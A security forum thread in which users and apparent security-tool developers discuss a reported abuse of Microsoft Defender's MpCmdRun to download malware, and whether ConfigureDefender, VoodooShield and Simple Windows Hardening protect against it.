Microsoft Defender can ironically be used to download malware

[Andy Ful]

In other words, should we be concerned about this "vulnerability" in WD if we are using ConfigDef at HIGH?

And just add VS to close all the "holes" in WD?

It is not "vulnerability" in WD, but rather "vulnerability" in Windows - it will work with any AV installed. It does not also decrease the protection of ConfigureDefender HIGH settings. The number of malware that can download something via LOLBins from the remote location will not be much greater. It is as true as introducing the new kind of expensive vodka does not increase the number of drinkers (some drinkers will stop drinking the Polish vodka and start drinking MpCmdRun vodka).
Using VS will add some protection to this setup, just like without MpCmdRun.

 

[danb]

Heaven forbid!
I do not create software to kill the system.

There are ways to protect the system without killing it .

 

[Andy Ful]

There are ways to protect the system without killing it .

Yes. Another one can be also VS. Some ways can be as different as Boxing and Judo.

 

[danb]

Yes. Another one can be also VS. Some ways can be as different as Boxing and Judo.

Which is why the best martial art is the one that adapts all of the strongest techniques from all of the various disciplines, like boxing, judo, kung fu, jujitsu, karate, aikido, etc., and combines the strongest techniques into one killer martial art. This is what Jim Harrison did when he created Bushidokan, and why Bruce Lee called Jim "one of the most dangerous men in the world". For example, a boxer is pretty tough to beat standing up, but if you can get him on the ground it is all over for him.

 

[Andy Ful]

Which is why the best martial art is the one that adapts all of the strongest techniques from all of the various disciplines, like boxing, judo, kung fu, jujitsu, karate, aikido, etc., and combines the strongest techniques into one killer martial art. This is what Jim Harrison did when he created Bushidokan, and why Bruce Lee called Jim "one of the most dangerous men in the world". For example, a boxer is pretty tough to beat standing up, but if you can get him on the ground it is all over for him.

It is interesting, but are we still talking about Microsoft Defender?
Anyway, it is probable that using such protection would be as hard as becoming Jim Harrison.
But seriously, you have just described the AV with Advanced Threat Protection.

 

[danb]

It is interesting, but are we still talking about Microsoft Defender?
Anyway, it is probable that using such protection would be as hard as becoming Jim Harrison.

My point is that all protections are not equivalent.

When a product is easier to effectively use than UAC and WD, then it is certainly not a concern .

I eagerly await your WDAC implementation! BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.

 

[Andy Ful]

My point is that all protections are not equivalent.

Just like my point.

I eagerly await your WDAC implementation! BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.

He is thinking for some months in silence.

 

[danb]

But seriously, you have just described the AV with Advanced Threat Protection.

Absolutely not. Jim only included 7 basic stances, blocks, strikes and kicks, but they were all extremely effective techniques.

 

[SearchLight]

For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.

 

[shmu26]

How does Voodooshield handle this particular issue? I am not asking about general philosophy, but rather about the particular issue addressed in the OP.

 

[ForgottenSeer 85179]

BTW, what ever happened to CHEF-KOCH's github fork of H_C? Didn't he used to work for Microsoft? He could have done some really cool stuff on your project.

His whole account get deleted (and I'm personally not shocked).

Yes he list Microsoft in account profile but that doesn't mean that was true nor in which group he was if it was true.

Also Chefkoch stole work from other and publish that as new project under own name without any credits. That's also the reason why all his projects get unmaintained. He got a lot of anger from many people because of that.
See e.g. FACT: CHEF-KOCH plagiarizes and passes off other people's work as his own · Issue #323 · ghacksuserjs/ghacks-user.js

 

[Gandalf_The_Grey]

For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.

If I understand all what's written about it correctly you are well protected against this with WD, VS and SWH.
WD detects this and VS and/or SWH would block the suspicious download due to anti-script (command-line) protection.
Another AV could not block this vulnerability that's present in Windows.
That means switching AV would not make you less vulnerable, maybe just the opposite.

 

[danb]

For most average PC users, imo the goal has always been to find the software that offers the "best" protection without bloat and complexity that makes people confirm a yes when they should say no. That being said, what software or combination fits this description? I am currently using WDConfigHIGH + VS(v5.97aBeta) + SWH.

This thread is making me wonder now if I should now switch to another free AV that is less of a target. For example Avast Free, set up in minimum protection config, and then just add VS? This would eliminate all the compensating WD add-ons. Have not decided yet on WD, just soliciting opinions.

I personally believe that WDConfigHIGH + VS(v5.97aBeta) + SWH is an amazing combo, especially when paired with either WD or a good free AV. This one single WD vulnerability is not really the main issue. The issue really is that WD is the most targeted AV. It really has turned into an amazing AV over the last couple of years, and from what I remember, I think it has about 50% of the marketshare... so it is the most targeted. But it is still an amazing AV, and it is free .

 

[SearchLight]

I personally believe that WDConfigHIGH + VS(v5.97aBeta) + SWH is an amazing combo, especially when paired with either WD or a good free AV. This one single WD vulnerability is not really the main issue. The issue really is that WD is the most targeted AV. It really has turned into an amazing AV over the last couple of years, and from what I remember, I think it has about 50% of the marketshare... so it is the most targeted. But it is still an amazing AV, and it is free .

So to minimize the issue of most targeted, we come back full circle to the old discussion that although WD is good one might be better off with a more robust AV. On the other hand, if ConfigDefender + SWH +VS compensates for WD's deficiencies, then one should just stick with it. Agree?

 

[danb]

How does Voodooshield handle this particular issue? I am not asking about general philosophy, but rather about the particular issue addressed in the OP.

VS will protect against this attack in several ways. First, VS considers the entire attack chain. For example, conhost is not a malicious process, but it can be used as one if called by a malicious parent. Hopefully that makes sense, otherwise I can go into further details if you want.

Second, all but like 5 or so Windows files are considered vulnerable processes by VS, so they are automatically added to the vulnerable process list, along with a huge list of other processes that are outside of the Windows System folder. The problem with this particular WD vulnerability is that its binaries are in the ProgramData folder as opposed to the Windows system folder. So right now I am testing to make sure we can add this item to VS's vulnerability list to provide even further protection, and if we can add it as a vulnerable process, all I have to do is update the vulnerable process list in the cloud, and VS will automatically update everyone's vulnerability list, which happens every 4 hours and when VS starts.

 

[danb]

His whole account get deleted (and I'm personally not shocked).

Yes he list Microsoft in account profile but that doesn't mean that was true nor in which group he was if it was true.

Also Chefkoch stole work from other and publish that as new project under own name without any credits. That's also the reason why all his projects get unmaintained. He got a lot of anger from many people because of that.
See e.g. FACT: CHEF-KOCH plagiarizes and passes off other people's work as his own · Issue #323 · ghacksuserjs/ghacks-user.js

Very interesting... I was wondering what happened .

 

[danb]

So to minimize the issue of most targeted, we come back full circle to the old discussion that although WD is good one might be better off with a more robust AV. On the other hand, if ConfigDefender + SWH +VS compensates for WD's deficiencies, then one should just stick with it. Agree?

Yeah, exactly. And the fact that WD is the most targeted does not mean you are going to be infected if you use WD. It simply means it is the most targeted , which is unfortunate . BTW, when Andy finishes his WDAC implementation (hopefully on SWH), I will be adding that to my machines as well.

 

[Ink]

Are there any alternatives to VoodooShield, that are paranoid about this article?

 

[Gandalf_The_Grey]

Are there any alternatives to VoodooShield, that are paranoid about this article?

Hard_Configurator or Simple Windows Hardening both from @Andy Ful would block the suspicious download due to anti-script (command-line) protection according to Andy. Of those two Simple Windows Hardening is the most a set and forget type of software.

 

[Andy Ful]

Are there any alternatives to VoodooShield, that are paranoid about this article?

It is a valid question, because most readers will be frightened after reading the article. So, there are some alternatives, but they are not necessary at all. Changing the protection due to this article would be as reasonable, as changing computer protection because it is raining.